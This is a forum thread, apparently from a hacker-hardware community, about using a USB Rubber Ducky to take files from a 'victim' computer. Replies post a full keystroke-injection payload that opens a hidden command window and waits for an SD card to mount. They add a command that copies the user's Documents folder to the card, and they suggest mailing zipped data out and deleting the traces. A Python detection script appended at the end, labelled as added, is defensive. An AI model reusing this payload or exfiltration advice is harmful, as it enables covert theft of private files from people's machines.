
Saving file from victim's computer to the USB Rubber Ducky



Hi,

I just bought a USB Rubber Ducky and I was wondering whether it is possible to save files directly from the victim PC to the Rubber Ducky. As in, if I used the payload to gather computer information, would I be able to save that straight from the victim PC to the Rubber Ducky?

Looking for any feedback in a fair bit of detail if possible. Thanks guys


It is possible, but not advisable, because the USB rubber ducky has very slow memory. Best to get a small 2 port hub/connector and use it to plug in both a USB rubber ducky and an exfiltration drive. The second flash drive will make the process much faster. One of the payloads that operates using this concept is the RunEXE from SD payload.

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---runexe-from-sd

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts. 
REM Encoder V2.4
REM Using the run command for a broader OS base. 
DEFAULT_DELAY 25
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected. 
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

Don't use the one that uses the diskpart command; it has been shown to only run on admin computers.

I kinda wish there were two flavors of duck, one that we can just litter parking lots with, and another that is slightly more expensive, and has faster upload speeds for exfiltration/reconnaissance tasks.

Edited by overwraith

So you want to save to the ducky. I may have misunderstood what you wanted, but I think it is still possible. You need to install the twin duck firmware:

https://code.google.com/p/ducky-decode/downloads/list

And modify the batch portion of the run exe from sd to the commands you want to run. Basically, this is the line that runs the file in the run exe from sd payload:

REM Continue script.
STRING START %myd%\HelloWorld.exe

Basically replace your commands there.


This, when typed in, makes a batch file that waits for the SD card to mount:

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER

When the SD card has mounted the program goes to ":break", executing the continue part of the script. You can access the drive letter using %myd%, so if you wanted a specific file to be copied to the SD card you would go:

copy %userprofile%\Documents\* %myd%

I think you might need a few extra flags to the copy command, but that's basically what you do. So instead of executing an executable like what the payload was designed to do, you swap out for this command.


Aside from the practical problem of the ducky having slow memory, the point of the ducky is that the OS will accept it without any additional user input or notification. No additional drivers will need to be installed; pretty much no system is set up in such a way that it rejects an additional keyboard. With the USB storage, these rules don't apply, and in a lot of the more interesting locations adding a thumbdrive would do nothing at best and raise alarms at its worst.

If you truly MUST get a hold of file data, I would suggest you write out the process of creating a zipfile containing the interesting bits and have the machine mail the data to you, removing the sent mail and zipfile afterwards. Alternatively you could use an FTP upload, but this is likely to be restricted via networking rules.
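
Added example (not part of the thread and not the payload author's code): a defender-side check that flags the process-creation pattern the RunEXE payload quoted above leaves behind, namely cmd started with its unusual switch set, wmic queried for volume labels, and wscript launching a .vbs with a batch file argument. The record keys (host, time, cmd), the rule names, the two-minute window and all sample events are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Command-line traits of the payload quoted in this thread (rule names are hypothetical).
RULES = {
    "cmd_odd_switches": re.compile(r"\bcmd(\.exe)?\b.*\s/Q\b.*\s/D\b.*/F:OFF\b.*/V:ON\b", re.I),
    "wmic_volume_label": re.compile(r"\bwmic(\.exe)?\b.*\bvolume\s+get\b.*\blabel\b", re.I),
    "wscript_runs_batch": re.compile(r"\bwscript(\.exe)?\b.*\.vbs\b.*\.(bat|cmd)\b", re.I),
}
WINDOW = timedelta(minutes=2)  # assumed correlation window

# Constructed process-creation records; keys are assumptions, not a real log schema.
SAMPLE = [
    {"host": "WS01", "time": "2024-01-01T10:00:03", "cmd": "cmd /Q /D /T:7F /F:OFF /V:ON /K"},
    {"host": "WS01", "time": "2024-01-01T10:00:20", "cmd": "wscript.exe invis.vbs DuckyWait.bat"},
    {"host": "WS01", "time": "2024-01-01T10:00:21",
     "cmd": 'cmd.exe /c wmic volume get driveletter, label | findstr "DUCKY"'},
    # Benign look-alikes: an admin inventory query and an ordinary script run.
    {"host": "WS02", "time": "2024-01-01T11:00:00", "cmd": "wmic volume get driveletter, label"},
    {"host": "WS03", "time": "2024-01-01T12:00:00", "cmd": r"wscript.exe C:\tools\report.vbs"},
]

def detect(events, min_rules=2):
    """Return {host: [rule names]} where min_rules distinct rules fire within WINDOW."""
    hits = {}
    for ev in events:
        ts = datetime.fromisoformat(ev["time"])
        for name, rx in RULES.items():
            if rx.search(ev["cmd"]):
                hits.setdefault(ev["host"], []).append((ts, name))
    alerts = {}
    for host, items in hits.items():
        items.sort()
        for start, _ in items:
            # Distinct rules seen from this event up to WINDOW later.
            names = {n for t, n in items if timedelta(0) <= t - start <= WINDOW}
            if len(names) >= min_rules:
                alerts[host] = sorted(names)
                break
    return alerts

if __name__ == "__main__":
    for host, rules in detect(SAMPLE).items():
        print(host, rules)
```

Requiring two distinct rules inside the window keeps a lone `wmic volume` inventory query or an ordinary wscript run from alerting on its own.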
